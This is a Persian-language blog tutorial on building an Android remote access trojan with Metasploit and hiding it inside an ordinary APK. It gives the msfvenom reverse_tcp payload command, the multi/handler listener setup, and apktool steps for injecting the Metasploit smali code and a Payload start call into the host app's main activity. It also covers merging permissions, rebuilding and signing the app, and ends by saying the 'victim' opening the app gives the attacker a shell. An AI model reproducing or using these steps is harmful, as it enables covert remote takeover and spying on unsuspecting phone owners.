ساخت رات با متا اسپلویت + پنهان سازی ان در apk دیگر (اموزش متنی)

ساخت وبلاگ

با سلام دوستان امروز می خواستم اموزش متنی ساخت رات با متاسپلویت و پنهان سازی ان در apk دیگر رو بهتون بدم

خب نرم افزارایی که نیاز داریم :
1-metasploit framework
2-apktool 2.1.1 (recommended)
3-signapk

نوبت به ساخت رات میرسه :

1- ترمینال را باز کرده

2-دستور زیر را وارد کنید :
msfvenom -p android/meterpreter/reverse_tcp LHOST=[your ip] LPORT=[your port] R>[mahal zakhire]rat.apk

خب حالا باید متاسپلویت رو راه بندازیم بر اساس این کانفیگ ها:

ترمینالی جدید ایجاد کرده و دستورات زیر را وارد کنید:
1-msfconsole
2-use multi/handler
3-set LHOST [your ip]
4- set LPORT [your port]
5-set PAYLOAD android/meterpreter/reverse_tcp
6-exploit
اینم از متاسپلویت
خبحالا نوبت بایند کردن میرسه
اول از همه باید rat و فایل apk عادی رو deassemble کنیم:
ترمینالی جدید باز کرده و این دستورات رو بزنین :
1- apktool d [mahal rat]rat.apk -o [mahal folder zakhire sazi]rat
2-apktool d [mahal apk]ye chizi.apk -o [mahal zakhire sazi apk]ye chizi
خب الان هر 2 دی اسمبل شدن
کار بعدی :
1- در فولدری که حاوی محتوای دی اسمبل شده ی رات هست وارد شوید و به smali رفته و com را باز کنید و فولدر متاسپلویت رو کپی کنید
و بعد به فولدر حاوی محتوای دی اسمبل شده ی apk عادی رفته و smali را باز کردی و در داخل فولدر com paste کنید
2-فولدر apk عادی رو باز کنید( حاوی دی اسمبل) و androidmainfest.xml را با notepad++ باز کنید و به دنبال android.intent.action.main بگردید و داخل activity که ان را پوشش می دهد به دنبال android:name بگردید و چیزی که جلوی ان و بین دو " قرار گرفته را یه جا ذخیره کنید.
متنی که بین دو " بود همچین شکلی دارد : felan.bahman.bisar.yechizi
خب شما باید در smali بدنبال فولدر felan و بعد داخل ان به دنبال bahman و بعد دوباره داخل ان بدنبال bisar و وقتی به یکی مونده به اخریش رسیدید yechizi.smali رو باید با notepad++ باز کنید
خب حالا در yechizi.smali باید به دنبال:
onCreate(Landroid/os/BundleV
بگردید و زیر ان این را کپی کنید:
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/ContextV

خب حالا باید همون androidMainfest.xml (برای apk عادی) رو باز کنیم و androidMainfest.xml برای رات رو هم از درون فولدرش باز کنیم و از داخل androidMainfest.xml برای رات همه تگ های user-permission رو
کپی در androidMainfest.xml نرم افزار عادی بکنیم.
همه چیز رو سیو می کنیم و نوبت میرسه به assemble کردن
وارد ترمینال میشیم و دستور زیر رو می نویسیم:
apktool b [folderi ke narm afzar adi bood] -o [ye makani]bindedrat.apk
خب الان اینتر رو می زنیم و منتظر میشیم که assemble کنه
زمانی که اسمبل کرد اخرین مرحله است که باید با signapk برنامه رو sign کنیم
دستور sign کردن :
java -jar signapk.jar [file daraye .pem] [file key] [makan apk sign nashode]bindedrat.apk [makan delkhah]signeddbindedrat.apk
خب اینم از امضا شده شد حالا اگه قربانی باز بکنه اینو ، باید ترمینالی که در ان metasploit رو بارگذاری کردیم مشاهده کنیم و برای ما shell درست می کند

اووووف چقد طول کشید ایشالا که کمکتون کرده باشه و لذت ببرید سوالی داشتین بگین در خدمتم.

آشیان امروز...
ما را در سایت آشیان امروز دنبال می کنید

برچسب : نویسنده : محمد رضا جوادیان asheyan بازدید : 2678 تاريخ : پنجشنبه 31 تير 1395 ساعت: 21:09